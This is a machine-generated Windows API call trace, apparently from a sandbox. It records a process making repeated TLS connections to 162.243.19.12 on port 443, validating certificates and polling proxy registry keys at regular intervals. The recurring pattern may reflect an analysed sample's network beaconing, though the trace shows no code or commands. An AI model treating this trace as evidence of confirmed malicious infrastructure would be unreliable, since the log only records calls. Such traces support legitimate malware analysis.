	[0109.916] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4839cd0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e483d848, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e483d848, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0109.916] FreeContextBuffer (in: pvContextBuffer=0x233fc686d20 | out: pvContextBuffer=0x233fc686d20) returned 0x0
	[0109.916] send (in: s=0x7cc, buf=0x233e483d918*, len=333, flags=0 | out: buf=0x233e483d918*) returned 333
	[0109.916] recv (in: s=0x7cc, buf=0x233e483d918, len=5, flags=0 | out: buf=0x233e483d918*) returned 5
	[0110.026] recv (in: s=0x7cc, buf=0x233e483d91d, len=49, flags=0 | out: buf=0x233e483d91d*) returned 49
	[0110.027] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4839cd0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e483db58, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e483db78, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e483db78, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0110.027] recv (in: s=0x7cc, buf=0x233e483dc68, len=5, flags=0 | out: buf=0x233e483dc68*) returned 5
	[0110.027] recv (in: s=0x7cc, buf=0x233e483dc8d, len=1, flags=0 | out: buf=0x233e483dc8d*) returned 1
	[0110.027] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4839cd0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e483dd60, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e483dd80, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e483dd80, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0110.027] recv (in: s=0x7cc, buf=0x233e483de70, len=5, flags=0 | out: buf=0x233e483de70*) returned 5
	[0110.027] recv (in: s=0x7cc, buf=0x233e483de95, len=48, flags=0 | out: buf=0x233e483de95*) returned 48
	[0110.028] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4839cd0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e483df98, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e483dfb8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e483dfb8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0110.028] FreeContextBuffer (in: pvContextBuffer=0x233e399c880 | out: pvContextBuffer=0x233e399c880) returned 0x0
	[0110.028] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e483e100 | out: pBuffer=0x233e483e100) returned 0x0
	[0110.028] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e483e158 | out: pBuffer=0x233e483e158) returned 0x0
	[0110.029] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e483e1c0 | out: pBuffer=0x233e483e1c0) returned 0x0
	[0110.029] CertDuplicateCertificateContext (pCertContext=0x233fc680730) returned 0x233fc680730
	[0110.030] CertDuplicateStore (hCertStore=0x233fc681af0) returned 0x233fc681af0
	[0110.030] CertEnumCertificatesInStore (hCertStore=0x233fc681af0, pPrevCertContext=0x0) returned 0x233fc680730
	[0110.030] CertDuplicateCertificateContext (pCertContext=0x233fc680730) returned 0x233fc680730
	[0110.030] CertEnumCertificatesInStore (hCertStore=0x233fc681af0, pPrevCertContext=0x233fc680730) returned 0x0
	[0110.030] CertCloseStore (hCertStore=0x233fc681af0, dwFlags=0x0) returned 1
	[0110.030] CertFreeCertificateContext (pCertContext=0x233fc680730) returned 1
	[0110.031] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc681c90
	[0110.031] CertAddCRLLinkToStore (in: hCertStore=0x233fc681c90, pCrlContext=0x233fc680730, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0110.032] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc680730, pTime=0x350199b4c8, hAdditionalStore=0x233fc681c90, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0110.036] CertDuplicateCertificateChain (pChainContext=0x233e39caa40) returned 0x233e39caa40
	[0110.044] CertDuplicateCertificateContext (pCertContext=0x233fc680730) returned 0x233fc680730
	[0110.045] CertDuplicateCertificateContext (pCertContext=0x233fc67fcb0) returned 0x233fc67fcb0
	[0110.046] CertDuplicateCertificateContext (pCertContext=0x233fc6808b0) returned 0x233fc6808b0
	[0110.046] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0110.046] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233e39caa40, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0110.046] SetLastError (dwErrCode=0x0) 
	[0110.046] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233e39caa40, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0110.048] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0110.048] CertFreeCertificateContext (pCertContext=0x233fc680730) returned 1
	[0110.068] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e4840dc8, MessageSeqNo=0x0 | out: pMessage=0x233e4840dc8) returned 0x0
	[0110.068] CoTaskMemAlloc (cb=0x20) returned 0x233fc64ff00
	[0110.068] WSASend (in: s=0x7cc, lpBuffers=0x233fc64ff00*=((len=0x3b, buf=0x233e483e088*), (len=0xd5, buf=0x233e4840bd0*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64ff00*=((len=0x3b, buf=0x233e483e088*), (len=0xd5, buf=0x233e4840bd0*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0110.069] CoTaskMemFree (pv=0x233fc64ff00) 
	[0110.069] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0110.069] recv (in: s=0x7cc, buf=0x233e4840f70, len=5, flags=0 | out: buf=0x233e4840f70*) returned 5
	[0110.561] recv (in: s=0x7cc, buf=0x233e4840f95, len=1488, flags=0 | out: buf=0x233e4840f95*) returned 1488
	[0110.561] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e4841678, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4841678, pfQOP=0x0) returned 0x0
	[0110.561] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0110.561] SetEvent (hEvent=0x6b4) returned 1
	[0110.605] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa58
	[0123.742] CloseHandle (hObject=0xa58) returned 1
	[0123.859] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa58) returned 0x0
	[0123.860] RegOpenKeyExW (in: hKey=0xa58, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x384) returned 0x0
	[0123.860] RegNotifyChangeKeyValue (hKey=0x384, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9c8, fAsynchronous=1) returned 0x0
	[0123.860] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x9bc) returned 0x0
	[0123.860] RegNotifyChangeKeyValue (hKey=0x9bc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa50, fAsynchronous=1) returned 0x0
	[0123.861] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa4c) returned 0x0
	[0123.861] RegNotifyChangeKeyValue (hKey=0xa4c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa70, fAsynchronous=1) returned 0x0
	[0123.861] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa68) returned 1
	[0123.861] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc689300
	[0123.861] WinHttpSetTimeouts (hInternet=0x233fc689300, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0123.861] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0123.866] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199be98 | out: TokenHandle=0x350199be98*=0xa7c) returned 1
	[0123.866] RegNotifyChangeKeyValue (hKey=0x738, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x73c, fAsynchronous=1) returned 0x0
	[0123.867] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199be28 | out: TokenHandle=0x350199be28*=0xa80) returned 1
	[0123.867] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199bed8 | out: pProxyConfig=0x350199bed8) returned 1
	[0123.871] select (in: nfds=0, readfds=0x233e48567f0, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48567f0, writefds=0x0, exceptfds=0x0) returned 1
	[0123.871] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0123.872] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0123.872] shutdown (s=0x7cc, how=2) returned 0
	[0123.873] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0123.873] closesocket (s=0x7cc) returned 0
	[0123.874] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0123.874] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa74
	[0123.874] WSAConnect (in: s=0x7cc, name=0x233e4857f88*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0123.981] closesocket (s=0xa74) returned 0
	[0123.981] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4854d28, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4858810, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4858810, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0123.982] FreeContextBuffer (in: pvContextBuffer=0x233fc6882b0 | out: pvContextBuffer=0x233fc6882b0) returned 0x0
	[0123.982] send (in: s=0x7cc, buf=0x233e48588e0*, len=333, flags=0 | out: buf=0x233e48588e0*) returned 333
	[0123.982] recv (in: s=0x7cc, buf=0x233e48588e0, len=5, flags=0 | out: buf=0x233e48588e0*) returned 5
	[0124.088] recv (in: s=0x7cc, buf=0x233e48588e5, len=49, flags=0 | out: buf=0x233e48588e5*) returned 49
	[0124.088] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4854d28, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4858b20, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e4858b40, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e4858b40, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0124.088] recv (in: s=0x7cc, buf=0x233e4858c30, len=5, flags=0 | out: buf=0x233e4858c30*) returned 5
	[0124.088] recv (in: s=0x7cc, buf=0x233e4858c55, len=1, flags=0 | out: buf=0x233e4858c55*) returned 1
	[0124.089] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4854d28, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4858d28, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e4858d48, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e4858d48, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0124.089] recv (in: s=0x7cc, buf=0x233e4858e38, len=5, flags=0 | out: buf=0x233e4858e38*) returned 5
	[0124.089] recv (in: s=0x7cc, buf=0x233e4858e5d, len=48, flags=0 | out: buf=0x233e4858e5d*) returned 48
	[0124.089] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4854d28, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4858f60, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e4858f80, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e4858f80, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0124.089] FreeContextBuffer (in: pvContextBuffer=0x233e399bec0 | out: pvContextBuffer=0x233e399bec0) returned 0x0
	[0124.090] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48590c8 | out: pBuffer=0x233e48590c8) returned 0x0
	[0124.090] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e4859120 | out: pBuffer=0x233e4859120) returned 0x0
	[0124.090] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e4859188 | out: pBuffer=0x233e4859188) returned 0x0
	[0124.090] CertDuplicateCertificateContext (pCertContext=0x233fc67f630) returned 0x233fc67f630
	[0124.090] CertDuplicateStore (hCertStore=0x233fc681af0) returned 0x233fc681af0
	[0124.090] CertEnumCertificatesInStore (hCertStore=0x233fc681af0, pPrevCertContext=0x0) returned 0x233fc67f630
	[0124.091] CertDuplicateCertificateContext (pCertContext=0x233fc67f630) returned 0x233fc67f630
	[0124.091] CertEnumCertificatesInStore (hCertStore=0x233fc681af0, pPrevCertContext=0x233fc67f630) returned 0x0
	[0124.091] CertCloseStore (hCertStore=0x233fc681af0, dwFlags=0x0) returned 1
	[0124.091] CertFreeCertificateContext (pCertContext=0x233fc67f630) returned 1
	[0124.092] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc6827f0
	[0124.092] CertAddCRLLinkToStore (in: hCertStore=0x233fc6827f0, pCrlContext=0x233fc67f630, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0124.092] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67f630, pTime=0x350199b4c8, hAdditionalStore=0x233fc6827f0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0124.096] CertDuplicateCertificateChain (pChainContext=0x233e39caa40) returned 0x233e39caa40
	[0124.097] CertDuplicateCertificateContext (pCertContext=0x233fc67f630) returned 0x233fc67f630
	[0124.098] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0124.099] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0124.099] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0124.099] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233e39caa40, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0124.099] SetLastError (dwErrCode=0x0) 
	[0124.099] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233e39caa40, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0124.100] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0124.100] CertFreeCertificateContext (pCertContext=0x233fc67f630) returned 1
	[0124.100] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e485bd90, MessageSeqNo=0x0 | out: pMessage=0x233e485bd90) returned 0x0
	[0124.100] CoTaskMemAlloc (cb=0x20) returned 0x233fc6503b0
	[0124.101] WSASend (in: s=0x7cc, lpBuffers=0x233fc6503b0*=((len=0x3b, buf=0x233e4859050*), (len=0xd5, buf=0x233e485bb98*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc6503b0*=((len=0x3b, buf=0x233e4859050*), (len=0xd5, buf=0x233e485bb98*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0124.101] CoTaskMemFree (pv=0x233fc6503b0) 
	[0124.101] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0124.101] recv (in: s=0x7cc, buf=0x233e485bf38, len=5, flags=0 | out: buf=0x233e485bf38*) returned 5
	[0124.679] recv (in: s=0x7cc, buf=0x233e485bf5d, len=1488, flags=0 | out: buf=0x233e485bf5d*) returned 1488
	[0124.679] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e485c640, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e485c640, pfQOP=0x0) returned 0x0
	[0124.679] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0124.679] SetEvent (hEvent=0x6b4) returned 1
	[0139.884] CloseHandle (hObject=0xa80) returned 1
	[0139.912] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0139.912] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xa58) returned 0x0
	[0139.912] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384
	[0139.912] RegNotifyChangeKeyValue (hKey=0xa58, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x384, fAsynchronous=1) returned 0x0
	[0139.912] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x9c8) returned 0x0
	[0139.913] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9bc
	[0139.913] RegNotifyChangeKeyValue (hKey=0x9c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9bc, fAsynchronous=1) returned 0x0
	[0139.913] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa50) returned 0x0
	[0139.913] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa4c
	[0139.913] RegNotifyChangeKeyValue (hKey=0xa50, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa4c, fAsynchronous=1) returned 0x0
	[0139.913] GetCurrentProcess () returned 0xffffffffffffffff
	[0139.913] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa70) returned 1
	[0139.913] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc688a80
	[0139.913] WinHttpSetTimeouts (hInternet=0x233fc688a80, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0139.913] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0139.996] SetEvent (hEvent=0x6b4) returned 1
	[0139.997] select (in: nfds=0, readfds=0x233e4873440, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e4873440, writefds=0x0, exceptfds=0x0) returned 1
	[0139.997] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0139.997] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0139.998] shutdown (s=0x7cc, how=2) returned 0
	[0139.999] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0139.999] closesocket (s=0x7cc) returned 0
	[0139.999] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0139.999] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa60
	[0140.000] WSAConnect (in: s=0x7cc, name=0x233e4874bd8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0140.106] closesocket (s=0xa60) returned 0
	[0140.106] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4871b80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4875460, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4875460, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0140.107] FreeContextBuffer (in: pvContextBuffer=0x233fc686a40 | out: pvContextBuffer=0x233fc686a40) returned 0x0
	[0140.107] send (in: s=0x7cc, buf=0x233e4875530*, len=333, flags=0 | out: buf=0x233e4875530*) returned 333
	[0140.107] recv (in: s=0x7cc, buf=0x233e4875530, len=5, flags=0 | out: buf=0x233e4875530*) returned 5
	[0140.228] recv (in: s=0x7cc, buf=0x233e4875535, len=49, flags=0 | out: buf=0x233e4875535*) returned 49
	[0140.229] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4871b80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4875770, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e4875790, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e4875790, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0140.229] recv (in: s=0x7cc, buf=0x233e4875880, len=5, flags=0 | out: buf=0x233e4875880*) returned 5
	[0140.229] recv (in: s=0x7cc, buf=0x233e48758a5, len=1, flags=0 | out: buf=0x233e48758a5*) returned 1
	[0140.229] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4871b80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4875978, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e4875998, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e4875998, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0140.229] recv (in: s=0x7cc, buf=0x233e4875a88, len=5, flags=0 | out: buf=0x233e4875a88*) returned 5
	[0140.229] recv (in: s=0x7cc, buf=0x233e4875aad, len=48, flags=0 | out: buf=0x233e4875aad*) returned 48
	[0140.229] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4871b80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4875bb0, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e4875bd0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e4875bd0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0140.231] FreeContextBuffer (in: pvContextBuffer=0x233e399b860 | out: pvContextBuffer=0x233e399b860) returned 0x0
	[0140.231] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e4875d18 | out: pBuffer=0x233e4875d18) returned 0x0
	[0140.231] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e4875d70 | out: pBuffer=0x233e4875d70) returned 0x0
	[0140.231] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e4875dd8 | out: pBuffer=0x233e4875dd8) returned 0x0
	[0140.231] CertDuplicateCertificateContext (pCertContext=0x233fc680630) returned 0x233fc680630
	[0140.232] CertDuplicateStore (hCertStore=0x233fc682240) returned 0x233fc682240
	[0140.232] CertEnumCertificatesInStore (hCertStore=0x233fc682240, pPrevCertContext=0x0) returned 0x233fc680630
	[0140.232] CertDuplicateCertificateContext (pCertContext=0x233fc680630) returned 0x233fc680630
	[0140.232] CertEnumCertificatesInStore (hCertStore=0x233fc682240, pPrevCertContext=0x233fc680630) returned 0x0
	[0140.232] CertCloseStore (hCertStore=0x233fc682240, dwFlags=0x0) returned 1
	[0140.232] CertFreeCertificateContext (pCertContext=0x233fc680630) returned 1
	[0140.233] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc682b30
	[0140.233] CertAddCRLLinkToStore (in: hCertStore=0x233fc682b30, pCrlContext=0x233fc680630, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0140.233] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc680630, pTime=0x350199b4c8, hAdditionalStore=0x233fc682b30, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0140.234] CertDuplicateCertificateChain (pChainContext=0x233e39caa40) returned 0x233e39caa40
	[0140.235] CertDuplicateCertificateContext (pCertContext=0x233fc680630) returned 0x233fc680630
	[0140.236] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0140.237] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0140.237] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0140.237] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233e39caa40, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0140.237] SetLastError (dwErrCode=0x0) 
	[0140.237] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233e39caa40, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0140.238] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0140.238] CertFreeCertificateContext (pCertContext=0x233fc680630) returned 1
	[0140.238] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48789e0, MessageSeqNo=0x0 | out: pMessage=0x233e48789e0) returned 0x0
	[0140.238] CoTaskMemAlloc (cb=0x20) returned 0x233fc6502f0
